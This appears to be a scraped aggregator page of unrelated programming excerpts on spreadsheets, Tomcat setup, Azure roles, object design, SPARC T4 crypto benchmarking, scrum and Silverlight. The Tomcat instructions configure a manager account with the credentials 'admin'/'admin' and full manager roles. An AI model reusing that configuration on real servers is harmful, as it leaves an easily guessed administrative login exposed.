    I have been in computer business for 15 years in various roles (sysadmin, developer, researcher), and I have never encountered someone using excel for something more advanced than for formatting tables, or as an ad-hoc database that could have been maintained in a text-file. I had to do heavy data-processing and plotting and for that I used some perl scripts + gnuplot, got tiredof it, and went over to R eventually. 2D spreadsheet just didn't seem well-suited for doing statistical analyses over 5-dimensional datasets (not to mention that it produces UGLY plots). I attempted to use spreadsheet for time-tracking, and found out that I would have better been served by a relational database, so I gave up on using excel for that too. For example, it's important to consistently name tasks, and I needed to find out unique task names in a given column across several sheets (I had one timesheet for each month). How do you make such "query" in a program that essentially evaluates independent cells and has little notion of relations between them? So, what are spreadsheets useful for? Why do they have a bunch of mathematical stuff built into them when, AFAICT, people use them mostly as table formatters or bad substitutes for databases?

    Read the article

  • How do I install Apache Tomcat 7?

    - by Anupesh
    Troubleshooting with apache Tomcat 7 steps should be followed .... after downloading apache-Tomcat 7 // open terminal go to that downloading file folder in which tar.gz file is still. Untar the tar file tar -xzvf filename.tar.gz move a extracted directory of apache-Tomcat7 in current path sudo mv Directory_Name(Extracted eg.apache-Tomcat 7.0.32) /usr/local/Tomcat7 to set environment variable for Tomcat7 sudo nano /usr/local/Tomcat7/bin/setenv.sh then Nano editor will open .. JAVA_HOME =/usr/lib/jvm/java-6-sun export CATALINA_OPTS="$CATALINA_OPTS -Xms128m -Xmx1024m -XX:MaxPermSize=256m after hit ctrl+X to save file to set the role and username and password. sudo nano /usr/local/Tomcat7/conf/./tomcat-users.xml <role rolename="manager-gui" /> <role rolename="manager-script" /> <role rolename="manager-jmx" /> <role rolename="manager-status" /> <user username="admin" password="admin" roles="manager-gui,manager-script,manager-jmx,manager-status"/> Ctrl+X to save file If Port no confliction comes in a way then open file to change the port no. sudo nano /usr/local/Tomcat7/conf/./server.xml then change the connector port as you want....

    Read the article

  • Windows Azure Upgrade Domain

    - by kaleidoscope
    Windows Azure automatically divides your role instances into some “logical” domains called upgrade domains. During upgrade, Azure is updating these domains one by one. This is a by design behavior to avoid nasty situations. Some of the last feature additions and enhancements on the platform was the ability to notify your role instances in case of “environment” changes, like adding or removing being most common. In such case, all your roles get a notification of this change. Imagine if you had 50 or 60 role instances, getting notified all at once and start doing various actions to react to this change. It will be a complete disaster for your service. The way to address this problem is upgrade domains. During upgrade Windows Azure updates them one by one and only the associated role instances to a specific domain get notified of the changes taking place. Only a small number of your role instances will get notified, react and the rest will remain intact providing a seamless upgrade experience and no service disruption or downtime. http://www.kefalidis.me/archive/2009/11/27/windows-azure-ndash-what-is-an-upgrade-domain.aspx   Lokesh, M

    Read the article

  • Inheritance versus Composition in a business application

    - by ProfK
    I have a training management and tracking system, with a high level structure as follows: We have a Role1, e.g. Manager, Shift-boss, miner, etc. and a Candidate, training for that Role. The role has a list of courses and their subjects the candidate needs to complete to qualify for the role. Candidate has a TrainingHistory attribute, containing the courses and subjects they have completed, their results, and the date completed. Now I see it as a TrainingHistoryCourse is-a Course, extended to add DateCompleted etc. but something is nagging at me to rather use something like a TrainingHistoryRecord that has-a Course. How can I further analyse this to determine which pattern to use? Then, a Role has a list of RoleTask definitions that the Candidate must be observed practising, and a Candidate has a history of RoleTaskObservation objects recording their performance at these tasks. This is very similar to the course/subject requirement and history pattern for the candidate, except for one less hierarchical level, but, a RoleTaskObservation clearly does not have an is-a relationship with RoleTask, unless I block my nose and rather use ObservedRoleTask. I would prefer to use the same pattern for both subject/course and task/observation structures, but I think that would force me to adopt a composition pattern for TrainingHistoryCourse. What is the wisdom here? Always inherit where possible and validated by a solid is-a association, or always favour composition wherever possible? 1 Client specified this to be called JobTitle, but he isn't writing the app, and a JobTitle is only one attribute of a Role. Authorization roles are handled by the DevExpress framework and its customization hooks, so there would be very little little confusion between a business Role in my domain objects and an authorization role in lower level, framework code.

    Read the article

  • How to tell if SPARC T4 crypto is being used?

    - by danx
    A question that often comes up when running applications on SPARC T4 systems is "How can I tell if hardware crypto accleration is being used?" To review, the SPARC T4 processor includes a crypto unit that supports several crypto instructions. For hardware crypto these include 11 AES instructions, 4 xmul* instructions (for AES GCM carryless multiply), mont for Montgomery multiply (optimizes RSA and DSA), and 5 des_* instructions (for DES3). For hardware hash algorithm optimization, the T4 has the md5, sha1, sha256, and sha512 instructions (the last two are used for SHA-224 an SHA-384). First off, it's easy to tell if the processor T4 crypto instructions—use the isainfo -v command and look for "sparcv9" and "aes" (and other hash and crypto algorithms) in the output: $ isainfo -v 64-bit sparcv9 applications crc32c cbcond pause mont mpmul sha512 sha256 sha1 md5 camellia kasumi des aes ima hpc vis3 fmaf asi_blk_init vis2 vis popc These instructions are not-privileged, so are available for direct use in user-level applications and libraries (such as OpenSSL). Here is the "openssl speed -evp" command shown with the built-in t4 engine and with the pkcs11 engine. Both run the T4 AES instructions, but the t4 engine is faster than the pkcs11 engine because it has less overhead (especially for smaller packet sizes): t-4 $ /usr/bin/openssl version OpenSSL 1.0.0j 10 May 2012 t-4 $ /usr/bin/openssl engine (t4) SPARC T4 engine support (dynamic) Dynamic engine loading support (pkcs11) PKCS #11 engine support t-4 $ /usr/bin/openssl speed -evp aes-128-cbc # t4 engine used by default . . . The 'numbers' are in 1000s of bytes per second processed. type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes aes-128-cbc 487777.10k 816822.21k 986012.59k 1017029.97k 1053543.08k t-4 $ /usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc engine "pkcs11" set. . . . The 'numbers' are in 1000s of bytes per second processed. type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes aes-128-cbc 31703.58k 116636.39k 350672.81k 696170.50k 993599.49k Note: The "-evp" flag indicates use the OpenSSL "EnVeloPe" API, which gives more accurate results. That's because it tells OpenSSL to use the same API that external programs use when calling OpenSSL libcrypto functions, evp(3openssl). DTrace Shows if T4 Crypto Functions Are Used OK, good enough, the isainfo(1) command shows the instructions are present, but how does one know if they are being used? Chi-Chang Lin, who works on Oracle Solaris performance, wrote a Dtrace script to show if T4 instructions are being executed. To show the T4 instructions are being used, run the following Dtrace script. Look for functions named "t4" and "yf" in the output. The OpenSSL T4 engine uses functions named "t4" and the PKCS#11 engine uses functions named "yf". To demonstrate, I'll first run "openssl speed" with the built-in t4 engine then with the pkcs11 engine. The performance numbers are not valid due to dtrace probes slowing things down. t-4 # dtrace -Z -n ' pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \ -c "/usr/bin/openssl speed -evp aes-128-cbc" dtrace: description 'pid$target::*yf*:entry' matched 101 probes . . . dtrace: pid 2029 has exited libcrypto.so.1.0.0 ENGINE_load_t4 1 libcrypto.so.1.0.0 t4_DH 1 libcrypto.so.1.0.0 t4_DSA 1 libcrypto.so.1.0.0 t4_RSA 1 libcrypto.so.1.0.0 t4_destroy 1 libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1 libcrypto.so.1.0.0 t4_init 1 libcrypto.so.1.0.0 t4_add_NID 3 libcrypto.so.1.0.0 t4_aes_expand128 5 libcrypto.so.1.0.0 t4_cipher_init_aes 5 libcrypto.so.1.0.0 t4_get_all_ciphers 6 libcrypto.so.1.0.0 t4_get_all_digests 59 libcrypto.so.1.0.0 t4_digest_final_sha1 65 libcrypto.so.1.0.0 t4_digest_init_sha1 65 libcrypto.so.1.0.0 t4_sha1_multiblock 126 libcrypto.so.1.0.0 t4_digest_update_sha1 261 libcrypto.so.1.0.0 t4_aes128_cbc_encrypt 1432979 libcrypto.so.1.0.0 t4_aes128_load_keys_for_encrypt 1432979 libcrypto.so.1.0.0 t4_cipher_do_aes_128_cbc 1432979 t-4 # dtrace -Z -n 'pid$target::*yf*:entry{ @[probemod, probefunc] = count();}   pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \ -c "/usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc" dtrace: description 'pid$target::*yf*:entry' matched 101 probes engine "pkcs11" set. . . . dtrace: pid 2033 has exited libcrypto.so.1.0.0 ENGINE_load_t4 1 libcrypto.so.1.0.0 t4_DH 1 libcrypto.so.1.0.0 t4_DSA 1 libcrypto.so.1.0.0 t4_RSA 1 libcrypto.so.1.0.0 t4_destroy 1 libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1 libcrypto.so.1.0.0 t4_get_all_ciphers 1 libcrypto.so.1.0.0 t4_get_all_digests 1 libsoftcrypto.so.1 rijndael_key_setup_enc_yf 1 libsoftcrypto.so.1 yf_aes_expand128 1 libcrypto.so.1.0.0 t4_add_NID 3 libsoftcrypto.so.1 yf_aes128_cbc_encrypt 1542330 libsoftcrypto.so.1 yf_aes128_load_keys_for_encrypt 1542330 So, as shown above the OpenSSL built-in t4 engine executes t4_* functions (which are hand-coded assembly executing the T4 AES instructions) and the OpenSSL pkcs11 engine executes *yf* functions. Programmatic Use of OpenSSL T4 engine The OpenSSL t4 engine is used automatically with the /usr/bin/openssl command line. Chi-Chang Lin also points out that if you're calling the OpenSSL API (libcrypto.so) from a program, you must call ENGINE_load_built_engines(), otherwise the built-in t4 engine will not be loaded. You do not call ENGINE_set_default(). That's because "openssl speed -evp" test calls ENGINE_load_built_engines() even though the "-engine" option wasn't specified. OpenSSL T4 engine Availability The OpenSSL t4 engine is available with Solaris 11 and 11.1. For Solaris 10 08/11 (U10), you need to use the OpenSSL pkcs311 engine. The OpenSSL t4 engine is distributed only with the version of OpenSSL distributed with Solaris (and not third-party or self-compiled versions of OpenSSL). The OpenSSL engine implements the AES cipher for Solaris 11, released 11/2011. For Solaris 11.1, released 11/2012, the OpenSSL engine adds optimization for the MD5, SHA-1, and SHA-2 hash algorithms, and DES-3. Although the T4 processor has Camillia and Kasumi block cipher instructions, these are not implemented in the OpenSSL T4 engine. The following charts may help view availability of optimizations. The first chart shows what's available with Solaris CLIs and APIs, the second chart shows what's available in Solaris OpenSSL. Native Solaris Optimization for SPARC T4 This table is shows Solaris native CLI and API support. As such, they are all available with the OpenSSL pkcs11 engine. CLIs: "openssl -engine pkcs11", encrypt(1), decrypt(1), mac(1), digest(1), MD5sum(1), SHA1sum(1), SHA224sum(1), SHA256sum(1), SHA384sum(1), SHA512sum(1) APIs: PKCS#11 library libpkcs11(3LIB) (incluDES Openssl pkcs11 engine), libMD(3LIB), and Solaris kernel modules AlgorithmSolaris 1008/11 (U10)Solaris 11Solaris 11.1 AES-ECB, AES-CBC, AES-CTR, AES-CBC AES-CFB128 XXX DES3-ECB, DES3-CBC, DES2-ECB, DES2-CBC, DES-ECB, DES-CBC XXX bignum Montgomery multiply (RSA, DSA) XXX MD5, SHA-1, SHA-256, SHA-384, SHA-512 XXX SHA-224 X ARCFOUR (RC4) X Solaris OpenSSL T4 Engine Optimization This table is for the Solaris OpenSSL built-in t4 engine. Algorithms listed above are also available through the OpenSSL pkcs11 engine. CLI: openssl(1openssl) APIs: openssl(5), engine(3openssl), evp(3openssl), libcrypto crypto(3openssl) AlgorithmSolaris 11Solaris 11SRU2Solaris 11.1 AES-ECB, AES-CBC, AES-CTR, AES-CBC AES-CFB128 XXX DES3-ECB, DES3-CBC, DES-ECB, DES-CBC X bignum Montgomery multiply (RSA, DSA) X MD5, SHA-1, SHA-256, SHA-384, SHA-512 XX SHA-224 X Source Code Availability Solaris Most of the T4 assembly code that called the new T4 crypto instructions was written by Ferenc Rákóczi of the Solaris Security group, with assistance from others. You can download the Solaris source for this and other parts of Solaris as a few zip files at the Oracle Download website. The relevant source files are generally under directories usr/src/common/crypto/{aes,arcfour,des,md5,modes,sha1,sha2}}/sun4v/. and usr/src/common/bignum/sun4v/. Solaris 11 binary is available from the Oracle Solaris 11 download website. OpenSSL t4 engine The source for the OpenSSL t4 engine, which is based on the Solaris source above, is viewable through the OpenGrok source code browser in directory src/components/openssl/openssl-1.0.0/engines/t4 . You can download the source from the same website or through Mercurial source code management, hg(1). Conclusion Oracle Solaris with SPARC T4 provides a rich set of accelerated cryptographic and hash algorithms. Using the latest update, Solaris 11.1, provides the best set of optimized algorithms, but alternatives are often available, sometimes slightly slower, for releases back to Solaris 10 08/11 (U10). Reference See also these earlier blogs. SPARC T4 OpenSSL Engine by myself, Dan Anderson (2011), discusses the Openssl T4 engine and reviews the SPARC T4 processor for the Solaris 11 release. Exciting Crypto Advances with the T4 processor and Oracle Solaris 11 by Valerie Fenwick (2011) discusses crypto algorithms that were optimized for the T4 processor with the Solaris 11 FCS (11/11) and Solaris 10 08/11 (U10) release. T4 Crypto Cheat Sheet by Stefan Hinker (2012) discusses how to make T4 crypto optimization available to various consumers (such as SSH, Java, OpenSSL, Apache, etc.) High Performance Security For Oracle Database and Fusion Middleware Applications using SPARC T4 (PDF, 2012) discusses SPARC T4 and its usage to optimize application security. Configuring Oracle iPlanet WebServer / Oracle Traffic Director to use crypto accelerators on T4-1 servers by Meena Vyas (2012)

    Read the article

  • Moving from Test Automation to Development

    - by avgvstvs
    I'm in an interesting quandary. I've been doing test automation using QTP for about 1.5 years, and am in the slow process of switching to a developer role in my same company. I also begin my Master's in CS this fall. An old friend is trying to recruit me for a Sr. Test Automation position that could potentially pay me $23k more for the exact same thing I do now. But obviously I would defer moving to development. The new company is much more technical overall (I would be moving from financial services to industrial automation, and they have MANY more software dev roles available. I know traditionally QA type jobs carry an odd "danger" tag, but test automation is really a different beast. Does anyone have any experience moving from test automation to development? Does the QA stigma exist? The extra $$ would be nice, but not at the expense of my career. I should note that my Master's will be on Systems/parallel programming, so one thought is that I'll get automatic consideraton for development upon completing my Master's. I also work 6hrs/wk doing game development with a friend.

    Read the article

  • Windows Azure Learning Plan - Compute

    - by BuckWoody
    This is one in a series of posts on a Windows Azure Learning Plan. You can find the main post here. This one deals with the "compute" function of Windows Azure, which includes Configuration Files, the Web Role, the Worker Role, and the VM Role. There is a general programming guide for Windows Azure that you can find here to help with the overall process.   Configuration Files Configuration Files define the environment for a Windows Azure application, similar to an ASP.NET application. This section explains how to work with these. General Introduction and Overview http://blogs.itmentors.com/bill/2009/11/04/configuration-files-and-windows-azure/ Service Definition File Schema http://msdn.microsoft.com/en-us/library/ee758711.aspx Service Configuration File Schema http://msdn.microsoft.com/en-us/library/ee758710.aspx  Windows Azure Web Role The Web Role runs code (such as ASP pages) that require a User Interface. Web Role "Boot Camp" Video  https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?culture=en-US&EventID=1032470854&CountryCode=US Web Role Deployment Checklist http://blogs.infragistics.com/blogs/anton_staykov/archive/2010/06/30/windows-azure-web-role-deployment-checklist.aspx  Using a Web Role as a Worker Role for Small Applications http://www.31a2ba2a-b718-11dc-8314-0800200c9a66.com/2010/12/how-to-combine-worker-and-web-role-in.html Windows Azure Worker Role  The Worker Role is used for code that does not require a direct User Interface. Worker Role "Boot Camp" Video https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?culture=en-US&EventID=1032470871&CountryCode=US Worker Role versus Web Roles http://msdn.microsoft.com/en-us/library/gg433012.aspx Deploying other applications (like Java) in a Windows Azure Worker Role http://blogs.msdn.com/b/mariok/archive/2011/01/05/deploying-java-applications-in-azure.aspx Windows Azure VM Role The Windows Azure VM Role is an Operating System-level mechanism for code deployment. VM Role Overview and Details  http://msdn.microsoft.com/en-us/library/gg465398.aspx  The proper use of the VM Role http://blogs.msdn.com/b/buckwoody/archive/2010/12/28/the-proper-use-of-the-vm-role-in-windows-azure.aspx

    Read the article

  • Software management for 2 programmers

    - by kajo
    Hi all, me and my very good friend do a small bussiness. We have company and we develop web apps using Scala. We have started 3 months ago and we have a lot of work now. We cannot afford to employ another programmer because we can't pay him now. Until now we try to manage entire developing process very simply. We use excel sheets for simple bug tracking and we work on client requests on the fly. We have no plan for next week or something similar. But now I find it very inefficient and useless. I am trying to find some rules or some methodology for small team or for only two guys. For example Scrum is, imo, unadapted for us. There are a lot of roles (ScrumMaster, Product Owner, Team...) and it seems overkill. Can you something advise me? Have you any experiences with software management in small teams? Is any methodology of current agile development fitten for pair of programmers? Is there any software management for simple bug tracking, maybe wiki or time management for two coders? thanks a lot for sharing.

    Read the article

  • Managing user privileges, best practice.

    - by Loïc N.
    I'm am new to web development. I'm creating a website where different user can have different privileges, such as creating/editing/deleting a news, or adding/editing/deleting whatever kind of content on the website. I started by creating a "user type" that would indicate the user's privileges (such as "user", "newser", "moderator", "admin", and so on), but i quickly started noticing issues that made me think that this might be a naive approach to this issue. What if i want to give a regular user the right to edit a news (for whatever reason)? Then the user would be half "user", half "newser". But the system i use can only handle one user-type. So what would be the best practice here? I was thinking of removing the concept of roles (or "user-types" such as newser) and only have the concept of "privilege", where every user could have zero to many privileges. So, to re-use the above example, if i wanted a user to have the right to edit some news, i would only have to give him a "edit news" privilege. Is this the way to go?

    Read the article

  • Cloud-Burst 2012&ndash;Windows Azure Developer Conference in Sweden

    - by Alan Smith
    The Sweden Windows Azure Group (SWAG) will running “Cloud-Burst 2012”, a two-day Windows Azure conference hosted at the Microsoft offices in Akalla, near Stockholm on the 27th and 28th September, with an Azure Hands-on Labs Day at AddSkills on the 29th September. The event is free to attend, and will be featuring presentations on the latest Azure technologies from Microsoft MVPs and evangelists. The following presentations will be delivered on the Thursday (27th) and Friday (29th): · Connecting Devices to Windows Azure - Windows Azure Technical Evangelist Brady Gaster · Grid Computing with 256 Windows Azure Worker Roles - Connected System Developer MVP Alan Smith · ‘Warts and all’. The truth about Windows Azure development - BizTalk MVP Charles Young · Using Azure to Integrate Applications - BizTalk MVP Charles Young · Riding the Windows Azure Service Bus: Cross-‘Anything’ Messaging - Windows Azure MVP & Regional Director Christian Weyer · Windows Azure, Identity & Access - and you - Developer Security MVP Dominick Baier · Brewing Beer with Windows Azure - Windows Azure MVP Maarten Balliauw · Architectural patterns for the cloud - Windows Azure MVP Maarten Balliauw · Windows Azure Web Sites and the Power of Continuous Delivery - Windows Azure MVP Magnus Mårtensson · Advanced SQL Azure - Analyze and Optimize Performance - Windows Azure MVP Nuno Godinho · Architect your SQL Azure Databases - Windows Azure MVP Nuno Godinho   There will be a chance to get your hands on the latest Azure bits and an Azure trial account at the Hands-on Labs Day on Saturday (29th) with Brady Gaster, Magnus Mårtensson and Alan Smith there to provide guidance, and some informal and entertaining presentations. Attendance for the conference and Hands-on Labs Day is free, but please only register if you can make it, (and cancel if you cannot). Cloud-Burst 2012 event details and registration is here: http://www.azureug.se/CloudBurst2012/ Registration for Sweden Windows Azure Group Stockholm is here: swagmembership.eventbrite.com The event has been made possible by kind contributions from our sponsors, Knowit, AddSkills and Microsoft Sweden.

    Read the article

  • Silverlight Cream for May 29, 2010 -- #872

    - by Dave Campbell
    In this Issue: Michael Washington, Chris Koenig, Kunal Chowdhury, SilverLaw, Shayne Burgess, Ian T. Lackey, Alan Beasley, Marlon Grech. Shoutouts: Ozymandias has a post up that's not Silverlight necessarily, but it's pretty cool: Typeface Selection Flowchart Damian Schenkelman posted about the latest: Prism 2.2 Release available. Get it at Codeplex. From SilverlightCream.com: Silverlight 4 OData Paging with RX Extensions Michael Washington continues with this OData and Rx post using the View Model Style. Michael has some good external links, good info, and all the code. WP7 Part 4: Morphing and Mapping Chris Koenig has the 4th in his WP7 series he's doing, and this one is on MVVMLight and BingMaps ... code included. Silverlight 4: Interoperability with Excel using the COM Object Kunal Chowdhury has a post up about Excel Interoperability using the COM object including opening an Excel Workbook and writing data out, then modifying the data in the spreadsheet and seeing it updated in the app. Creating A Flexible Surface Effect – Silverlight 4 (Part 1) SilverLaw put up a demo of an awesome 'water ripple' SL4 demo a couple days ago, and now he's got part 1 of a great tutorial explaining it all. Service Operations and the WCF Data Services Client Shayne Burgess has a post up about Service Operations and how they can be used by the WCF Data Services client. Role Based Silverlight Behaviors Also from the Open Light Group, Ian T. Lackey has a post up about Behaviors that takes a list of roles and updates the UI appropriatetly. How to Toggle (Show/Hide) using Behaviours (Behaviors) between Visual States or Storyboards in Expression Blend for Windows Phone Alan Beasley has a quick post up talking about the solution he found to a problem he was having with state switching in a WP7 app. MEFedMVVM: Testability Marlon Grech has another MEFedMVVM post up and he's discussing Testability all rolled in there with everything else :) Stay in the 'Light! Twitter SilverlightNews | Twitter WynApse | WynApse.com | Tagged Posts | SilverlightCream Join me @ SilverlightCream | Phoenix Silverlight User Group Technorati Tags: Silverlight    Silverlight 3    Silverlight 4    Windows Phone MIX10

    Read the article

  • Issue 15: SVP Focus

    - by rituchhibber
         SVP FOCUS FOCUS -- Chris Baker SVP Oracle Worldwide ISV-OEM-Java Sales Chris Baker is the Global Head of ISV/OEM Sales responsible for working with ISV/OEM partners to maximise Oracle's business through those partners, whilst maximising those partners’ business to their end users. Chris works with partners, customers, innovators, investors and employees to develop innovative business solutions using Oracle products, services and skills. RESOURCES -- Oracle PartnerNetwork (OPN) OPN Solutions Catalog Oracle Exastack Program Oracle Exastack Optimized Oracle Cloud Computing Oracle Engineered Systems Oracle and Java SUBSCRIBE FEEDBACK PREVIOUS ISSUES "By taking part in marketing activities, our partners accelerate their sales cycles." -- Firstly, could you please explain Oracle's current strategy for ISV partners, globally and in EMEA? Oracle customers use independent software vendor (ISV) applications to run their businesses. They use them to generate revenue and to fulfil obligations to their own customers. Our strategy is very straight-forward. We want all of our ISV partners and OEMs to concentrate on the things that they do the best—building applications to meet the unique industry and functional requirements of their customer. We want to ensure that we deliver a best-in-class application platform so ISVs are free to concentrate their effort on their application functionality and user experience We invest over four billion dollars in research and development every year, and we want our ISVs to benefit from all of that investment in operating systems, virtualisation, databases, middleware, engineered systems, and other hardware. By doing this, we help them to reduce their costs, gain more consistency and agility for quicker implementations, and also rapidly differentiate themselves from other application vendors. It's all about simplification because we believe that around 25 to 30 percent of the development costs incurred by many ISVs are caused by customising infrastructure and have nothing to do with their applications. Our strategy is to enable our ISV partners to standardise their application platform using engineered architecture, so they can write once to the Oracle stack and deploy seamlessly in the cloud, on-premise, or in hybrid deployments. It's really important that architecture is the same in order to keep cost and time overheads at a minimum, so we provide standardisation and an environment that enables our ISVs to concentrate on the core business that makes them the most money and brings them success. How do you believe this strategy is helping the ISVs to work hand-in-hand with Oracle to ensure that end customers get the industry-leading solutions that they need? We work with our ISVs not just to help them be successful, but also to help them market themselves. We have something called the 'Oracle Exastack Ready Program', which enables ISVs to publicise themselves as 'Ready' to run the core software platforms that run on Oracle's engineered systems including Exadata and Exalogic. So, for example, they can become 'Database Ready' which means that they use the latest version of Oracle Database and therefore can run their application without modification on Exadata or the Oracle Database Appliance. Alternatively, they can become WebLogic Ready, Oracle Linux Ready and Oracle Solaris Ready which means they run on the latest release and therefore can run their application, with no new porting work, on Oracle Exalogic. Those 'Ready' logos are important in helping ISVs advertise to their customers that they are using the latest technologies which have been fully tested. We now also have Exadata Ready and Exalogic Ready programmes which allow ISVs to promote the certification of their applications on these platforms. This highlights these partners to Oracle customers as having solutions that run fluently on the Oracle Exadata Database Machine, the Oracle Exalogic Elastic Cloud or one of our other engineered systems. This makes it easy for customers to identify solutions and provides ISVs with an avenue to connect with Oracle customers who are rapidly adopting engineered systems. We have also taken this programme to the next level in the shape of 'Oracle Exastack Optimized' for partners whose applications run best on the Oracle stack and have invested the time to fully optimise application performance. We ensure that Exastack Optimized partner status is promoted and supported by press releases, and we help our ISVs go to market and differentiate themselves through the use of our technology and the standardisation it delivers. To date we have had several hundred organisations successfully work through our Exastack Optimized programme. How does Oracle's strategy of offering pre-integrated open platform software and hardware allow ISVs to bring their products to market more quickly? One of the problems for many ISVs is that they have to think very carefully about the technology on which their solutions will be deployed, particularly in the cloud or hosted environments. They have to think hard about how they secure these environments, whether the concern is, for example, middleware, identity management, or securing personal data. If they don't use the technology that we build-in to our products to help them to fulfil these roles, they then have to build it themselves. This takes time, requires testing, and must be maintained. By taking advantage of our technology, partners will now know that they have a standard platform. They will know that they can confidently talk about implementation being the same every time they do it. Very large ISV applications could once take a year or two to be implemented at an on-premise environment. But it wasn't just the configuration of the application that took the time, it was actually the infrastructure - the different hardware configurations, operating systems and configurations of databases and middleware. Now we strongly believe that it's all about standardisation and repeatability. It's about making sure that our partners can do it once and are then able to roll it out many different times using standard componentry. What actions would you recommend for existing ISV partners that are looking to do more business with Oracle and its customer base, not only to maximise benefits, but also to maximise partner relationships? My team, around the world and in the EMEA region, is available and ready to talk to any of our ISVs and to explore the possibilities together. We run programmes like 'Excite' and 'Insight' to help us to understand how we can help ISVs with architecture and widen their environments. But we also want to work with, and look at, new opportunities - for example, the Machine-to-Machine (M2M) market or 'The Internet of Things'. Over the next few years, many millions, indeed billions of devices will be collecting massive amounts of data and communicating it back to the central systems where ISVs will be running their applications. The only way that our partners will be able to provide a single vendor 'end-to-end' solution is to use Oracle integrated systems at the back end and Java on the 'smart' devices collecting the data—a complete solution from device to data centre. So there are huge opportunities to work closely with our ISVs, using Oracle's complete M2M platform, to provide the infrastructure that enables them to extract maximum value from the data collected. If any partners don't know where to start or who to contact, then they can contact me directly at [email protected] or indeed any of our teams across the EMEA region. We want to work with ISVs to help them to be as successful as they possibly can through simplification and speed to market, and we also want all of the top ISVs in the world based on Oracle. What opportunities are immediately opened to new ISV partners joining the OPN? As you know OPN is very, very important. New members will discover a huge amount of content that instantly becomes accessible to them. They can access a wealth of no-cost training and enablement materials to build their expertise in Oracle technology. They can download Oracle software and use it for development projects. They can help themselves become more competent by becoming part of a true community and uncovering new opportunities by working with Oracle and their peers in the Oracle Partner Network. As well as publishing massive amounts of information on OPN, we also hold our global Oracle OpenWorld event, at which partners play a huge role. This takes place at the end of September and the beginning of October in San Francisco. Attending ISV partners have an unrivalled opportunity to contribute to elements such as the OpenWorld / OPN Exchange, at which they can talk to other partners and really begin thinking about how they can move their businesses on and play key roles in a very large ecosystem which revolves around technology and standardisation. Finally, are there any other messages that you would like to share with the Oracle ISV community? The crucial message that I always like to reinforce is architecture, architecture and architecture! The key opportunities that ISVs have today revolve around standardising their architectures so that they can confidently think: "I will I be able to do exactly the same thing whenever a customer is looking to deploy on-premise, hosted or in the cloud". The right architecture is critical to being competitive and to really start changing the game. We want to help our ISV partners to do just that; to establish standard architecture and to seize the opportunities it opens up for them. New market opportunities like M2M are enormous - just look at how many devices are all around you right now. We can help our partners to interface with these devices more effectively while thinking about their entire ecosystem, rather than just the piece that they have traditionally focused upon. With standardised architecture, we can help people dramatically improve their speed, reach, agility and delivery of enhanced customer satisfaction and value all the way from the Java side to their centralised systems. All Oracle ISV partners must take advantage of these opportunities, which is why Oracle will continue to invest in and support them. Oracle OpenWorld 2010 Whether you attended Oracle OpenWorld 2009 or not, don't forget to save the date now for Oracle OpenWorld 2010. The event will be held a little earlier next year, from 19th-23rd September, so please don't miss out. With thousands of sessions and hundreds of exhibits and demos already lined up, there's no better place to learn how to optimise your existing systems, get an inside line on upcoming technology breakthroughs, and meet with your partner peers, Oracle strategists and even the developers responsible for the products and services that help you get better results for your end customers. Register Now for Oracle OpenWorld 2010! Perhaps you are interested in learning more about Oracle OpenWorld 2010, but don't wish to register at this time? Great! Please just enter your contact information here and we will contact you at a later date. How to Exhibit at Oracle OpenWorld 2010 Sponsorship Opportunities at Oracle OpenWorld 2010 Advertising Opportunities at Oracle OpenWorld 2010 -- Back to the welcome page

    Read the article

  • Git-based storage and publishing, infrastructure advice

    - by Joel Martinez
    I wanted to get some advice on moving a system to "the cloud" ... specifically, I'm looking to move into some of Windows Azure's managed services, as right now I'm managing a VM. Basically, the system operates on some data stored in a github git repository. I'll describe the current architecture: Current system (all hosted on a single server): GitHub - configured with a webhook pointing at ... ASP.NET MVC application - to accept the webhook from git. It pushes a message onto ... Azure service bus Queue - which is drained by ... Windows Service - pulls the message from the queue and ... Fetches the latest data from the git repository (using GitLib2Sharp) onto the local disk and finally ... Operates on the data in git to produce a static HTML website hosted/served by IIS. The system works really well, actually ... but I would like to get out of the business of managing the VM, and move to using some combination of Azure web and worker roles. But because the system relies so heavily on the git repository on the local filesystem, I'm finding it difficult to figure out how to architect in the cloud. I know you can get file system access, so in theory I could just fetch the repository if there's nothing on disk ... but the performance/responsiveness of the system sort of depends on the repository being available and only having to fetch diffs, which is relatively quick. As opposed to periodically having to fetch the entire (somewhat large) git repository if the web or worker role was recycled, or something. So I would love some advice on how you would architect such a system :) Ultimately, the only real requirement is to be able to serve HTML content that's been produced from the contents of a git repository (in a relatively responsive manner, from a publishing perspective) ... please feel free to ask any clarifying questions if there's something I omitted. Thanks!

    Read the article

  • Using Scrum on small projects where Owner doesn't want to be involved

    - by Andrej Mohar
    Recently I've been reading and learning quite a lot about scrum and I like it a lot. However, I do have a couple of likely scenarios in my head to which I don't know the solution. So let's say that I might want to organize an agile team of (for instance) four web developers (one of them UI/UX designer). This team would operate on scrum principles. Initially we would probably be working on projects like landing pages for ordinary people's small businesses, like renting apartments, selling cookies... Such customers simply can't be set with Product Owner role (IMHO), because they usually expect to hire a company, give them the overall project goal with some details, and then expect the job to be done (including a lot of decision making) with as little of their involvement as possible (in their opinion, they have more important things to do). Let's say I'd like to engage myself in a developer/scrum master role (I know that even that is debatable, being a team member and scrum master at once), so I simply shouldn't take the role of the product owner as well. So as for my questions: If I'm my company's business owner, do I simply need to be a product owner as well (do these roles include each other)? Can I employ a sales person which might have the product owner role? Would it be better if it is an experienced developer instead of a sales person? Is this even a smart move? Lastly, is there another agile approach that might better suit my position? EDIT: Thank you everyone for good inputs. I added some comments, any aditional info will be greatly appreciated.

    Read the article

  • Can defect containment metrics be readily applied at an organizational level when there is only a consistant organizational process framework?

    - by Thomas Owens
